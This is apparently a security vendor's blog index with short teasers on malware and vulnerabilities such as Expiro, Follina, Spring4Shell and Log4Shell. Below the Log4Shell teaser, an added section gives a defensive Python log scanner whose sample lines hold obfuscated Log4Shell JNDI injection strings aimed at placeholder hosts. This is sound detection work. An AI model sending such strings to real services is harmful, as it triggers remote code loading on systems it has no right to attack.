Expiro: Old Virus Poses a New Challenge

A recent virus infection faced by some users was swiftly identified as being caused by Expiro. We conducted an in-depth investigation into the inner workings of Expiro and what makes it such a potent threat. This article lays out the analysis and findings of our Security Research Lab and offers […]

Your Office Document is at Risk – XLL, A New Attack Vector

Microsoft Office documents are used worldwide by corporations and home users alike. Its various Office versions, licensed or unlicensed, offer users an easy way to create and modify files. However, the software is also susceptible to cyberattacks. Cybercriminals often take advantage of its weaknesses and use VBA (Visual Basic for Applications) macros as entry […]


Cryptojacking on the Rise

There has been a steep rise in cryptojacking attacks, in which cybercriminal groups infiltrate networks and stealthily mine cryptocurrency. Quick Heal detected 14.3 million such attacks through 2022, a 37% year-on-year increase. Large-scale cryptojacking is fast emerging as a popular trend in the cybercrime landscape. Let us explore […]

Proactive Measures to Safeguard against the Ransomware Menace

Ransomware is malware that infects computing devices and holds their data hostage to extort money from victims. It uses encryption to render the victim's data unusable. Ransomware attacks have evolved over time, and the encryption used against victims has become more sophisticated and is often impractical to break. […]


PowerShell: An Attacker’s Paradise

PowerShell was originally intended as a task automation and configuration management tool for system administrators. However, it did not take long for attackers to realize its potential for carrying out offensive operations without being detected. Because of PowerShell's versatility, it can be seen at every stage of an attack, from initial infection vectors, where it is used in macros […]


Threat Advisory: CVE-2022-30190 ‘Follina’ – Severe Zero-day Vulnerability discovered in MSDT

A high-severity zero-day remote code execution vulnerability, CVE-2022-30190 'Follina', has been identified in the Microsoft Windows Support Diagnostic Tool (MSDT). MSDT ships with Windows 7 and later and is used to diagnose problems in applications such as Microsoft Office when a user reports an issue to Microsoft support. […]

Spring4Shell: Zero-Day vulnerability CVE-2022-22965 in Spring Framework

A critical zero-day remote code execution vulnerability, CVE-2022-22965, also known as Spring4Shell or SpringShell, has been identified in Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. The Spring Framework is a popular, feature-rich open-source application framework for building modern enterprise Java web applications. Publicly available exploits for this widely […]


CVE-2021-44228: New Apache Log4j ‘Log4Shell’ Zero-Day Being Exploited in the Wild

A critical zero-day vulnerability (CVE-2021-44228) was recently discovered in Apache Log4j, the popular open-source Java logging library used in countless applications worldwide. The maximum-severity vulnerability, dubbed 'Log4Shell', could allow a remote attacker to execute arbitrary code and take control of vulnerable systems. According to some security researchers, the […]
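As an added example (not part of the original advisory, and not Quick Heal's code), here is the detection logic a defender typically wants alongside a Log4Shell write-up: a small Python scanner that flags `${jndi:...}` lookups in access-log lines. It first collapses the nested-lookup obfuscations (`${lower:j}`, `${::-j}`, `${env:X:-j}`) that Log4j itself resolves before the lookup fires, so a naive `grep jndi` would miss them. The log lines and IP addresses are constructed for this example.

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookup strings in log lines,
including the nested-lookup tricks used to evade plain string matching."""
import re

# Constructed sample log lines for this example (not from the original page).
# 198.51.100.0/24 and 203.0.113.0/24 are documentation address ranges.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET /?x=${${lower:j}${upper:n}di:rmi://198.51.100.7/b} HTTP/1.1" 404',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${${env:NaN:-j}ndi:${::-l}dap://203.0.113.4/c}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-d}ns://203.0.113.4/d}"',
    '10.0.0.3 - - "GET /docs/${date:yyyy} HTTP/1.1" 200',
]

# An innermost ${...} with no further nesting inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The final, de-obfuscated JNDI lookup; capture the target URI for triage.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([^}]+)\}", re.IGNORECASE)


def _resolve(body: str):
    """Emulate how Log4j's string substitution handles one innermost lookup.

    Returns the replacement text, or None to leave the lookup untouched.
    Only the lookups attackers abuse for obfuscation are modelled here.
    """
    default = None
    if ":-" in body:  # "${prefix:name:-default}" falls back to the default text
        body, default = body.split(":-", 1)
    prefix, _, arg = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if default is not None:
        # env:, sys:, or an empty prefix with a name chosen not to resolve:
        # the ':-' default is what ends up in the string.
        return default
    return None


def normalize(line: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups innermost-first until the string stops changing."""
    for _ in range(max_rounds):
        def repl(match):
            resolved = _resolve(match.group(1))
            return match.group(0) if resolved is None else resolved

        new_line = INNER_LOOKUP.sub(repl, line)
        if new_line == line:
            return line
        line = new_line
    return line


def scan(lines):
    """Return one hit per JNDI lookup found, with the line index and target URI."""
    hits = []
    for index, raw in enumerate(lines):
        normalized = normalize(raw)
        for match in JNDI.finditer(normalized):
            hits.append({
                "line": index,
                "payload": match.group(1).strip(),
                "obfuscated": normalized != raw,  # nesting had to be unwrapped
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(f"line {hit['line']}: {hit['payload']} (obfuscated={hit['obfuscated']})")
```

Run it as a filter over web-server, proxy or application logs; any hit warrants checking which Log4j version the receiving service runs and whether the target host was contacted. The normalization step is what matters: Log4j evaluates the inner lookups first, so the payload the JNDI code sees is the collapsed form, not what appears in the raw log.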

HorseDeal Riding on The Curveball!

It is striking how quickly attackers put new vulnerabilities to use in malware campaigns. Microsoft patched a very interesting vulnerability in its January 2020 Patch Tuesday update: a spoofing vulnerability in the Windows CryptoAPI (Crypt32.dll) validation of Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using […]